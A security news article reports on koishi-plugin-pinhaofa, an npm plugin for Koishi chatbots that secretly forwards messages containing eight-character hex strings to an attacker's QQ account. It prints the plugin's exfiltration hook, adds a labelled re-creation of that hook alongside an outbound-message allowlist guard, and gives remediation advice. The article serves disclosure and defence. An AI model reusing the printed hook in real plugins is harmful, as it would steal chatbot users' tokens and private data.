Friday, June 13, 2025
Malicious npm Package in Koishi Chatbots Secretly Steals Sensitive Data

by Charline

May 21, 2025 – Cybersecurity researchers have discovered a hidden data theft operation targeting users of Koishi chatbots. The attack uses a malicious npm package called koishi-plugin-pinhaofa that quietly monitors and steals sensitive information from chatbot conversations.

The plugin looks harmless at first. But researchers found that it inspects every message the chatbot processes. When a message contains an eight-character hexadecimal string bounded by non-hex characters, something that could be a short Git commit hash, a short API token, or a fragment of a JWT, the plugin immediately forwards the entire message to a fixed QQ account controlled by the attacker.

Koishi is a popular TypeScript framework for building cross-platform chatbots that work on QQ, Telegram, Discord, and more. It offers more than 1,000 community plugins, making it useful for businesses, especially in e-commerce and customer service.

The growing use of chatbots makes this threat even more serious. According to eMarketer, by 2026, one in three U.S. adults will use banking chatbots. This increases the importance of strong security in chatbot platforms.

Researchers at Socket.dev identified the malicious package during routine scans; their AI-based scanner flagged the plugin as known malware. The narrow trigger is what makes the plugin effective. Eight-character hex strings are common in commit hashes, short tokens and session or device identifiers, so the filter picks out the messages most likely to carry secrets while leaving everything else untouched, which keeps the volume of exfiltrated traffic small enough to escape notice.

Impact Across Industries

The threat affects multiple sectors. A banking bot might leak payment details. An e-commerce chatbot could expose links containing login tokens. In healthcare, bots might reveal patient information.

Koishi plugins run inside the chatbot’s trusted environment. This gives them full access to all messages. Installing a plugin without reviewing its code means the bot could unknowingly allow malware to read or change any message.

How the Attack Works

The malware uses a simple but effective method. It runs only a few lines of JavaScript code that hook into the message system of Koishi. Here’s the core of the code:

ctx.on("message", (session) => {
  // Eight hex characters bounded by a non-hex character (or the start/end of the string).
  const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
  // String.replace with a string pattern removes only the first space, not all of them.
  const content = session.content.replace(" ", "");
  if (hexRegex.test(content)) {
    // Forward the whole message to the attacker's hard-coded QQ account.
    session.bot.sendPrivateMessage("1821181277", content);
    // Second call as it appears in the quoted snippet: extractAll8DigitHex is not
    // defined in the excerpt, and only one argument is passed.
    session.bot.sendPrivateMessage(extractAll8DigitHex(content)[0]);
  }
});

The malware sends stolen messages through the same channel the bot normally uses, such as QQ. The exfiltration is an ordinary outbound private message from the bot's own account, so there is no unusual network destination for a firewall, proxy or egress filter to catch, and the traffic looks legitimate.
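To make the mechanism concrete, here is an added example that is not code from the page, from the malicious package or from Koishi: it re-creates the hook's behaviour against a tiny stand-in for Koishi's event bus and bot object (assumed shapes, not the real API), then wraps sendPrivateMessage with a recipient allowlist so the exfiltration channel is cut off at the bot boundary. The sample messages and the allowed account ID 10001 are constructed.

```javascript
// Added example: re-creation of the reported hook plus an outbound-message guard.
// The event bus and bot below are stand-ins for Koishi's ctx/session (assumed
// shapes, not Koishi's implementation) so everything runs offline.

const ATTACKER_QQ = "1821181277"; // recipient hard-coded in the plugin, per the report

// The same matcher the plugin used: 8 hex chars bounded by non-hex characters.
const HEX8 = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;

// Minimal stand-in for Koishi's event bus: ctx.on(event, handler) / emit.
function makeContext() {
  const handlers = {};
  return {
    on(event, handler) { (handlers[event] = handlers[event] || []).push(handler); },
    emit(event, session) { for (const h of handlers[event] || []) h(session); },
  };
}

// Minimal stand-in for a Koishi bot: records every outbound private message.
function makeBot() {
  const sent = [];
  return {
    sent,
    async sendPrivateMessage(userId, content) { sent.push({ userId, content }); },
  };
}

// Behaviour reconstructed from the article's description of the plugin.
function installExfilHook(ctx) {
  ctx.on("message", (session) => {
    const content = session.content.replace(" ", ""); // strips only the FIRST space
    if (HEX8.test(content)) session.bot.sendPrivateMessage(ATTACKER_QQ, content);
  });
}

// Defensive wrapper: only recipients on the allowlist may receive private messages.
// Blocked attempts are recorded so an operator can see which plugin misbehaved.
function guardOutbound(bot, allowedRecipients) {
  const blocked = [];
  const original = bot.sendPrivateMessage.bind(bot);
  bot.sendPrivateMessage = async (userId, content) => {
    if (!allowedRecipients.has(String(userId))) {
      blocked.push({ userId, preview: content.slice(0, 40) });
      return; // dropped silently; the plugin gets no signal that it was blocked
    }
    return original(userId, content);
  };
  return blocked;
}

// Drive a few constructed messages through both the hook and the guard.
function simulate() {
  const ctx = makeContext();
  const bot = makeBot();
  const blocked = guardOutbound(bot, new Set(["10001"])); // constructed support account
  installExfilHook(ctx);

  const messages = [
    "deploying commit a1b2c3d4 to prod", // short git SHA -> exfil attempt
    "order 8f3e9a12 shipped",            // harmless order id -> also matches
    "hello there",                       // no 8-hex run
    "digest 3b7f2e1a9c0d4e5f",           // 16 hex chars in a row, no bounded 8-run
  ];
  for (const content of messages) ctx.emit("message", { content, bot });
  // A legitimate private message from the bot still goes through.
  bot.sendPrivateMessage("10001", "ticket escalated");
  return { delivered: bot.sent, blocked };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(simulate(), null, 2));
}
```

Two of the four constructed messages trigger the hook, and both attempts end up in the blocked list instead of reaching the attacker's account, while the bot's own message to the allowed account is delivered. Note that the second sample, an order number, shows how the filter also fires on innocuous eight-character identifiers.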

The package was published by an npm user with the alias kuminfennel. The attacker registered using an email that matches the QQ account used for data exfiltration: [email protected].

Security Recommendations

Experts urge organizations using Koishi chatbots to review all installed plugins right away. They also suggest running bots in isolated containers to limit data access and reduce risk.

In addition, tools like Socket’s GitHub app can detect suspicious packages during installation. This helps protect chatbot platforms from supply chain attacks before the code reaches production environments.

© 2024 Copyright  proxyserverpro.com